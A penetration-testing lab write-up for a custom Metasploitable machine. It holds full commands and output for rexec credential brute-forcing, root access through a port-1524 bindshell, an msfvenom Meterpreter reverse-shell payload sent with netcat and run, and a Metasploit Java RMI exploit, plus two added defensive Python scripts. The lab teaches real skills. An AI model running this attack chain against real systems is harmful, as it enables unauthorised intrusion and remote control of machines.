Metasploitable (Custom 3)
This is a custom vulnerable machine for a penetration testing module. I had to perform certain tasks and gain root privileges within a given amount of time.

Recon: N/A
Reconnaissance was not needed for this exercise
Scanning: Nmap
The target IP address was 192.168.249.150
-p-: All ports
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
-O: Enable OS detection
-oA: Output in the three major formats at once
┌──(kali㉿kali)-[~/custom3]
└─$ nmap -sV -p- --open 192.168.249.150 -vvvv -oA c3Open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 18:06 +08
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 18:06
Scanning 192.168.249.150 [2 ports]
Completed Ping Scan at 18:06, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:06
Completed Parallel DNS resolution of 1 host. at 18:06, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:06
Scanning 192.168.249.150 [65535 ports]
Discovered open port 37535/tcp on 192.168.249.150
Discovered open port 1524/tcp on 192.168.249.150
Discovered open port 512/tcp on 192.168.249.150
Discovered open port 37310/tcp on 192.168.249.150
Discovered open port 513/tcp on 192.168.249.150
Discovered open port 514/tcp on 192.168.249.150
Discovered open port 42503/tcp on 192.168.249.150
Discovered open port 58931/tcp on 192.168.249.150
Completed Connect Scan at 18:06, 2.61s elapsed (65535 total ports)
Initiating Service scan at 18:06
Scanning 8 services on 192.168.249.150
Completed Service scan at 18:08, 126.19s elapsed (8 services on 1 host)
NSE: Script scanning 192.168.249.150.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.02s elapsed
Nmap scan report for 192.168.249.150
Host is up, received conn-refused (0.0011s latency).
Scanned at 2022-03-31 18:06:17 +08 for 129s
Not shown: 65505 closed tcp ports (conn-refused), 22 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
512/tcp open exec syn-ack netkit-rsh rexecd
513/tcp open login? syn-ack
514/tcp open tcpwrapped syn-ack
1524/tcp open bindshell syn-ack Bash shell (**BACKDOOR**; root shell)
37310/tcp open status syn-ack 1 (RPC #100024)
37535/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
42503/tcp open mountd syn-ack 1-3 (RPC #100005)
58931/tcp open java-rmi syn-ack GNU Classpath grmiregistry
Service Info: Host: custom3; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.12 seconds
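The port table above already tells a defender which services to worry about. The following script, added here and not part of the original write-up, parses that table (the sample is constructed from the output shown) and flags the high-risk services; the HIGH_RISK rules are this example's own assumptions, not nmap's.

```python
"""Triage the nmap port table from the scan above and flag the exposed services a
defender should look at first. Added example, not part of the original write-up:
the input is constructed from the PORT table shown and the risk labels are this
example's own assumptions."""
import re

SAMPLE_NMAP_OUTPUT = """\
PORT      STATE SERVICE    REASON  VERSION
512/tcp   open  exec       syn-ack netkit-rsh rexecd
513/tcp   open  login?     syn-ack
514/tcp   open  tcpwrapped syn-ack
1524/tcp  open  bindshell  syn-ack Bash shell (**BACKDOOR**; root shell)
42503/tcp open  mountd     syn-ack 1-3 (RPC #100005)
58931/tcp open  java-rmi   syn-ack GNU Classpath grmiregistry
"""

# Assumed triage rules: nmap service name -> why it matters to a defender.
HIGH_RISK = {
    "exec": "rexec sends credentials in cleartext; disable or firewall",
    "login": "rlogin relies on host trust files; disable",
    "bindshell": "unauthenticated shell listener; treat host as compromised",
    "java-rmi": "RMI registry may allow remote class loading; restrict access",
}

# One nmap port line: "<port>/<proto> <state> <service> <reason> [<version>]"
PORT_LINE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+"
                       r"(?P<service>\S+)\s+(?P<reason>\S+)(?:\s+(?P<version>.*))?$")

def parse_ports(text):
    """Return one dict per nmap port line; the header and other lines are skipped."""
    rows = []
    for m in filter(None, (PORT_LINE.match(ln.strip()) for ln in text.splitlines())):
        row = m.groupdict()
        row["port"], row["version"] = int(row["port"]), (row["version"] or "").strip()
        rows.append(row)
    return rows

def triage(text):
    """(port, service, reason) for each open port that matches a rule. nmap appends
    '?' to a guessed service name, so that marker is stripped before matching."""
    findings = []
    for row in parse_ports(text):
        if row["state"] != "open":
            continue
        svc = row["service"].rstrip("?")
        if svc in HIGH_RISK:
            findings.append((row["port"], svc, HIGH_RISK[svc]))
        elif "BACKDOOR" in row["version"]:
            findings.append((row["port"], svc, "nmap flagged a backdoor banner"))
    return findings

if __name__ == "__main__":
    for port, svc, reason in triage(SAMPLE_NMAP_OUTPUT):
        print(f"{port:>5}/tcp {svc:<10} {reason}")
```

On the sample above it reports ports 512, 513, 1524 and 58931; the same parser runs unchanged on the normal-format (.nmap) file that -oA writes.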
Enumeration: "It Worked" Rexec-Brute (NSE)
There was a hint to investigate port 512
PORT STATE SERVICE VERSION
512/tcp open exec syn-ack netkit-rsh rexecd
nmap -sV -p 512 --script=rexec-brute 192.168.249.150
┌──(kali㉿kali)-[~/custom3]
└─$ nmap -sV -p 512 --script=rexec-brute 192.168.249.150
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 18:19 +08
Nmap scan report for 192.168.249.150
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
512/tcp open exec netkit-rsh rexecd
| rexec-brute:
| Accounts:
| root:root - Valid credentials
| netadmin:netadmin - Valid credentials
| guest:guest - Valid credentials
| user:user - Valid credentials
| web:web - Valid credentials
| sysadmin:sysadmin - Valid credentials
| administrator:administrator - Valid credentials
| webadmin:webadmin - Valid credentials
| admin:admin - Valid credentials
| test:test - Valid credentials
|_ Statistics: Performed 13 guesses in 1 seconds, average tps: 13.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
The results above show that the accounts are still using default login credentials (each password is the same as the username)
The next task was to find out what information was being transferred when accessing the port
msfconsole
search rexec
┌──(kali㉿kali)-[~/custom3]
└─$ msfconsole
msf6 > search rexec
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/misc/consul_rexec_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Rexec
1 auxiliary/scanner/rservices/rexec_login normal No rexec Authentication Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/rservices/rexec_login
msf6 >
use auxiliary/scanner/rservices/rexec_login
msf6 > use auxiliary/scanner/rservices/rexec_login
msf6 auxiliary(scanner/rservices/rexec_login) > set password root
password => root
msf6 auxiliary(scanner/rservices/rexec_login) > set rhosts 192.168.249.150
rhosts => 192.168.249.150
msf6 auxiliary(scanner/rservices/rexec_login) > set username root
username => root
msf6 auxiliary(scanner/rservices/rexec_login) > options
Module options (auxiliary/scanner/rservices/rexec_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
ENABLE_STDERR false yes Enables connecting the stderr port
PASSWORD root no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 192.168.249.150 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 512 yes The target port (TCP)
STDERR_PORT no The port to listen on for stderr
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/rservices/rexec_login) >
run
msf6 auxiliary(scanner/rservices/rexec_login) > run
[*] 192.168.249.150:512 - 192.168.249.150:512 - Starting rexec sweep
[*] 192.168.249.150:512 - 192.168.249.150:512 - Attempting rexec with username:password 'root':'root'
[-] 192.168.249.150:512 - 192.168.249.150:512 - [1/1] - Result: xxxxx xxx xxx?
[*] 192.168.249.150:512 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/rservices/rexec_login) >
The secret message was revealed as the following:
[-] 192.168.249.150:512 - 192.168.249.150:512 - [1/1] - Result: xxxxx xxx xxx?
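The task above asked what information crosses the wire when port 512 is used. rexecd reads the client's request as four NUL-terminated ASCII strings (stderr port, user, password, command), so the password is visible to anyone who can see the traffic. The decoder below is an added example, not part of the original write-up; the request and reply bytes are constructed to mirror the root:root result above, and the alert wording is this example's own.

```python
"""Decode an rexec (TCP/512) client request as it travels on the wire and list
what a defender should notice: the password is sent in cleartext, and in this lab
it also equals the username. Added example, not part of the original write-up;
the request and reply bytes below are constructed, not captured from the lab host."""

# rexecd reads four NUL-terminated ASCII strings from the client:
#   <stderr port, "0" or empty for none> NUL <user> NUL <password> NUL <command> NUL
SAMPLE_REQUEST = b"0\x00root\x00root\x00id\x00"   # constructed, mirrors root:root above
SAMPLE_REPLY_OK = b"\x00"                         # constructed: server accepted login
SAMPLE_REPLY_ERR = b"\x01Login incorrect.\n"      # constructed: server rejected login

def parse_rexec_request(payload):
    """Split a client request into its fields; anything after the command is stdin."""
    parts = payload.split(b"\x00", 4)
    if len(parts) < 5:
        raise ValueError("truncated rexec request: expected four NUL-terminated fields")
    port, user, password, command = (p.decode("ascii", "replace") for p in parts[:4])
    return {"stderr_port": int(port or "0"), "user": user, "password": password,
            "command": command, "stdin": parts[4]}

def parse_rexec_reply(payload):
    """rexecd answers with a single NUL byte on success, or 0x01 plus an error text."""
    if not payload:
        raise ValueError("empty rexec reply")
    if payload[0] == 0:
        return {"accepted": True, "error": ""}
    return {"accepted": False,
            "error": payload[1:].rstrip(b"\n").decode("ascii", "replace")}

def rexec_alerts(request, reply=None):
    """Findings for one observed rexec exchange, as a list of strings."""
    alerts = [f"cleartext password for user '{request['user']}' observed on TCP/512"]
    if request["user"] and request["user"] == request["password"]:
        alerts.append("password equals username: likely default credential")
    if request["user"] == "root":
        alerts.append("remote command execution requested as root")
    if reply is not None and reply["accepted"]:
        alerts.append(f"server accepted the login; command run: {request['command']!r}")
    return alerts

if __name__ == "__main__":
    req = parse_rexec_request(SAMPLE_REQUEST)
    for line in rexec_alerts(req, parse_rexec_reply(SAMPLE_REPLY_OK)):
        print("ALERT:", line)
```

Feeding it the TCP payload of a real port-512 connection from a capture yields the same alerts, which is the case for replacing the r-services with SSH.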

Exploitation: "Succeeded" Netcat / Msfvenom
The next task requires a Meterpreter session. Hence, I will make use of the following vulnerability:
PORT STATE SERVICE REASON VERSION
1524/tcp open bindshell syn-ack Bash shell (**BACKDOOR**; root shell)
(Remote Host) Initiating a connection to port 1524 on the remote host:
nc 192.168.249.150 1524
whoami
┌──(kali㉿kali)-[~/custom3]
└─$ nc 192.168.249.150 1524
root@custom3:/# whoami
root
root@custom3:/#
(Local Host) Creating a payload using Msfvenom:
msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.249.140 lport=8999 -f elf -o payload.elf
┌──(kali㉿kali)-[~/custom3]
└─$ msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.249.140 lport=8999 -f elf -o payload.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 1106792 bytes
Final size of elf file: 1106792 bytes
Saved as: payload.elf
(Remote Host) Preparing the netcat listener to receive the file 'payload.elf'
netcat -nlvp 9899 > payload.elf
┌──(kali㉿kali)-[~/custom3]
└─$ nc 192.168.249.150 1524
root@custom3:/# whoami
root
root@custom3:/# netcat -nlvp 9899 > payload.elf
listening on [any] 9899 ...
(Local Host) Sending the file from the local host:
netcat -w 2 192.168.249.150 9899 < payload.elf
┌──(kali㉿kali)-[~/custom3]
└─$ netcat -w 2 192.168.249.150 9899 < payload.elf
(Remote Host) Run 'ls' to verify that 'payload.elf' was transferred from the local host to the remote host
ls
connect to [192.168.249.150] from (UNKNOWN) [192.168.249.140] 34790
root@custom3:/# ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
payload.elf
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
root@custom3:/#
(Local Host) Start a listener using Msfconsole:
msfconsole
use exploit/multi/handler
set lhost 192.168.249.140
set lport 8999 (the same port number as the payload created using Msfvenom)
options
┌──(kali㉿kali)-[~/custom3]
└─$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter_reverse_tcp
payload => linux/x86/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.249.140
lhost => 192.168.249.141
msf6 exploit(multi/handler) > set lport 8999
lport => 8999
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 8999 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
run
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.249.140:8999
(Remote Host) I will need to change the file permissions of 'payload.elf' so that it is executable
ls -la | grep payload.elf
root@custom3:/# ls -la | grep payload.elf
-rw-r--r-- 1 root root 1106792 Mar 31 08:15 payload.elf
chmod 777 payload.elf
ls -la | grep payload.elf
root@custom3:/# chmod 777 payload.elf
root@custom3:/# ls -la | grep payload.elf
-rwxrwxrwx 1 root root 1106792 Mar 31 08:15 payload.elf
root@custom3:/#
Executing the file 'payload.elf'
./payload.elf
root@custom3:/# ./payload.elf
(Remote Host) The following is an example of the output when an unsuitable payload is used:
bash: [5694: 3] tcsetattr: Invalid argument
Segmentation fault
root@custom3:/#
Note: If the error output is 'Segmentation fault', it may be because a staged payload ('linux/x86/meterpreter/reverse_tcp') was used instead of a stageless payload ('linux/x86/meterpreter_reverse_tcp')
Reference: https://github.com/rapid7/metasploit-framework/issues/12142#issuecomment-516057212
(Local Host) After executing the payload on the remote host, I received a Meterpreter session on my local host machine
getuid
sysinfo
[*] Started reverse TCP handler on 192.168.249.140:8999
[*] Meterpreter session 1 opened (192.168.249.140:8999 -> 192.168.249.150:60321 ) at 2022-03-31 20:29:58 +0800
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.249.150
OS : Ubuntu x8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
Executing 'getuid' showed that the Server username is 'root'!
Exploitation: "Succeeded" Java RMI (Msfconsole)
I will attempt to exploit the Java RMI service on port 58931 using Msfconsole
PORT STATE SERVICE VERSION
58931/tcp open java-rmi GNU Classpath grmiregistry
msfconsole
┌──(kali㉿kali)-[~/custom3]
└─$ msfconsole
msf6 >
search type:exploit java rmi
msf6 > search type:exploit java rmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce 2019-05-22 excellent Yes Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
1 exploit/multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution
2 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
3 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation
4 exploit/multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution
5 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
6 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
7 exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
8 exploit/multi/http/totaljs_cms_widget_exec 2019-08-30 excellent Yes Total.js CMS 12 Widget JavaScript Code Injection
Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/totaljs_cms_widget_exec
msf6 >
use exploit/multi/misc/java_rmi_server
set rhosts 192.168.249.150
set rport 58931
set lhost 192.168.249.140
set lport 8889
msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.249.150
rhosts => 192.168.249.150
msf6 exploit(multi/misc/java_rmi_server) > set rport 58931
rport => 58931
msf6 exploit(multi/misc/java_rmi_server) > set lhost 192.168.249.140
lhiost => 192.168.249.140
msf6 exploit(multi/misc/java_rmi_server) > set lport 8889
lport => 8889
msf6 exploit(multi/misc/java_rmi_server) > options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 192.168.249.150 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 58931 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 8889 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf6 exploit(multi/misc/java_rmi_server) >
run
msf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.249.140:8889
[*] 192.168.249.150:58931 - Using URL: http://0.0.0.0:8080/ggqTzR
[*] 192.168.249.150:58931 - Local IP: http://192.168.249.140:8080/ggqTzR
[*] 192.168.249.150:58931 - Server started.
[*] 192.168.249.150:58931 - Sending RMI Header...
[*] 192.168.249.150:58931 - Sending RMI Call...
[*] 192.168.249.150:58931 - Replied to request for payload JAR
[*] Sending stage (58053 bytes) to 192.168.249.150
[*] Meterpreter session 1 opened (192.168.249.140:8889 -> 192.168.249.150:60997 ) at 2022-03-31 15:42:26 +0800
[-] 192.168.249.150:58931 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.150:58931 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >
I am getting the following errors:
[-] 192.168.249.150:58931 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.150:58931 - Server stopped.
[*] Exploit completed, but no session was created.
However, the output also mentioned 'Meterpreter session 1 opened'. Hence, I ran 'sessions' to check whether a session really existed
sessions
msf6 exploit(multi/misc/java_rmi_server) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter java/linux root @ custom3 192.168.249.140:8889 -> 192.168.249.150:60997 (192.168.249.150)
msf6 exploit(multi/misc/java_rmi_server) >
sessions 1
getuid
sysinfo
msf6 exploit(multi/misc/java_rmi_server) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : custom3
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter >
Executing 'getuid' showed that the Server username is 'root'!